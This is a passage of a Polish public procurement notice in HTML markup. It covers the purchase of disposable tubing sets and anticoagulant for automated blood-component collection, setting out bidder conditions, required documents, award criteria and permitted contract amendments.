id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">33141000-0</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33141300-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33141600-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33141640-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33140000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33692500-2</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">12</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że w okresie nie wcześniejniż ostatnich 3 lat przed upływem składania ofert, a jeżeli okres prowadzenia działalnościjest krótszy - w tym okresie, wykonał co najmniej dwie dostawy jednorazowych zestawów drenów przeznaczonych do automatycznego pobierania składników krwi: krwinek płytkowych, osocza i/lub krwinek czerwonych przy pomocy separatora oraz antykoagulantu do poboru koncentratu krwinek płytkowych metodą automatyczną - o wartości co najmniej 450 000,00 zł brutto .</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"> 4.1.1. odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalnościgospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celupotwierdzenia braku podstaw wykluczenia na podstawie art.24 ust.5 pkt 1 ustawy.4.1.2.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RzeczypospolitejPolskiej, zamiast dokumentu o którym mowa powyżej, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.4.1.3. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejscezamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. 4.1.4. W przypadku oferty wspólnej (konsorcjum) dokumenty składa odrębnie każdy z uczestnikówkonsorcjum.4.1.5 Dokumenty sporządzone w języku obcym składane są wraz z tłumaczeniem na język polski.4.1.6. Jeżeli wykonawca nie złożył oświadczenia, o którym mowa w art. 25a ust. 1, oświadczeńlub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1, lub innych dokumentów niezbędnych do przeprowadzenia postępowania, oświadczenia lub dokumenty są niekompletne, zawierają błędy lub budzą wskazane przez zamawiającego wątpliwości, zamawiający wzywa do ich złożenia, uzupełnienia lub poprawienia lub do udzielania wyjaśnień w terminie przez siebie wskazanym, chyba że mimo ich złożenia, uzupełnienia lub poprawienia lub udzielenia wyjaśnień oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania.4.1.7. Jeżeli wykonawca nie złożył wymaganych pełnomocnictw albo złożył wadliwe pełnomocnictwa, zamawiający wzywa do ich złożenia w terminie przez siebie wskazanym, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania.4.1.8. Zamawiający wzywa także, w wyznaczonym przez siebie terminie, do złożenia wyjaśnieńdotyczących oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"> ZałącznikiStanowią one integralną część siwz i wymagań związanych z realizacją przedmiotu zamówienia.Załącznik nr 1 - opis przedmiotu zamówienia,Załącznik nr 2 - formularz ofertowy,Załącznik nr 3 - oświadczenie składane na podstawie art.25a ust.1 ustawy Pzp dotyczące spełniania warunków udziału w postępowaniu,Załącznik nr 4 - oświadczenie składane na podstawie art.25a ust. 1 ustawy Pzp dotyczące przesłanek wykluczenia z postępowania,Załącznik nr 5 - oświadczenie składane na podstawie art.24 ust.11 ustawy Pzp dotyczące przesłanki wykluczenia z postępowania - art.24 ust.1 pkt 23,Załącznik nr 6 - projekt umowy.5. W celu potwierdzenia, że oferowane dostawy, odpowiadają wymaganiom określonym rzez Zamawiającego, Zamawiający żąda załączenia do oferty następujących dokumentów: a) Deklaracje zgodności dla przedmiotu zamówienia (w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem) - potwierdzającą oznakowanie wyrobów znakiem CE lub samo świadectwo CE. b) Zgłoszenie do Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych zgodnie z ustawą z dnia z dnia 20 maja 2010 r. o wyrobach medycznych ( Dz. U. z 2010r., Nr 107, poz. 679, z późn zm. ), o ile jest to wymagane polskim prawem.c) Certyfikat jakości potwierdzający spełnienie przez oferowane materiały medyczne wymagania Farmakopei Europejskiej.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>CENA</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>GWARANCJA</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>TERMIN DOSTAWY</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>JAKOŚĆ</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Istotne postanowienia dla pakietu I iIIZamawiający zastrzega sobie prawo zakupu mniejszej ilości Zestawów niż określona w OPZ. Zamawiający jednocześnie wskazuje, że ostateczna ich ilość nie może być mniejsza niż 70% wartości umowy. Ograniczenie takie nie jest odstąpieniem od umowy, a Wykonawca oświadcza wyraża na nią zgodę. Wykonawcy nie przysługują wobec Zamawiającego żadne roszczenia z tytułu zmniejszenia ilości Zestawów. Wykonawcy będzie przysługiwało jedynie wynagrodzenie za zrealizowane dostawy.Zamawiający dopuszcza możliwość wprowadzenia istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących przypadkach i na określonych warunkach: 1. zmiana terminu dostawy: a. zmiany będące następstwem okoliczności leżących wyłącznie po stronie Zamawiającego, w szczególności wstrzymanie dostarczania Zestawów, b. zmiany będące wynikiem czasowego wstrzymania produkcji Zestawów lub ich braków na polskim rynku, w tym będące następstwem działania organów administracji publicznej.Dla pakietu 3Zamawiający dopuszcza możliwość wprowadzenia istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących przypadkach i na określonych warunkach: 1. Zmiana terminu dostawy: a. zmiany spowodowane siłą wyższą, w tym klęskami żywiołowymi, warunkami atmosferycznymi uniemożliwiającymi zrealizowanie dostawy w terminie; b. zmiany będące następstwem okoliczności leżących wyłącznie po stronie Zamawiającego, w szczególności wstrzymanie dostawy; c. zmiany będące wynikiem czasowego wstrzymania produkcji towarów lub braków towarów na polskim rynku będących przedmiotem umowy, w tym będące następstwem działania organów administracji publicznej; d. dopuszczalne jest skrócenie terminu wykonania umowy; e. dopuszczalne jest wydłużenie czasu trwania umowy w sytuacji niewykorzystania przez Zamawiającego przedmiotu umowy przy zachowaniu jej wartości.W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt a. - c. termin dostawy może ulec odpowiedniemu przedłużeniu o czas niezbędny do należytego jej wykonania, nie dłużej jednak niż o okres tych okoliczności. 2. Zmiana sposobu spełnienia świadczenia: a. zmiany spowodowane nieprzewidywalną koniecznością dostawy towarów nie wymienionych w umowie - Zamawiający w powyższym przypadku dopuszcza zakup towarów zamiennych, równoważnych (np. towarów w zamiennym opakowaniu lub towarów o tożsamej nazwie międzynarodowej innego producenta o innej nazwie handlowej), ale ich cena nie może przewyższać ceny towarów podstawowych; Wykonawca zobowiązany jest dostarczyć go na zasadach określonych w niniejszej umowie; b. dopuszczalna jest zmiana świadczenia Wykonawcy na lepszej jakości przy zachowaniu tożsamości przedmiotu świadczenia. 3. Zmiany wynagrodzenia Wykonawcy: a. zmiany polegające na obniżeniu wynagrodzenia Wykonawcy przy zachowaniu zakresu jego świadczenia umownego; b. zmiany spowodowane udzieleniem przez Wykonawcę upustów promocyjnych - W przypadku udzielenia przez Wykonawcę upustów promocyjnych dla klienta w okresie trwania umowy, upusty będą obowiązywały również dla tej umowy; c. zmiany spowodowane wzrostem albo zmniejszeniem stawki VAT - jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów towarów po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia Wykonawcy o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez Wykonawcę; jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów towarów po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT zapłaconego przez Wykonawcę. 4. Dopuszczalna jest zmiana umowy polegająca na zmianie danych Wykonawcy bez zmian samego Wykonawcy (np. zmiana siedziby, adresu, 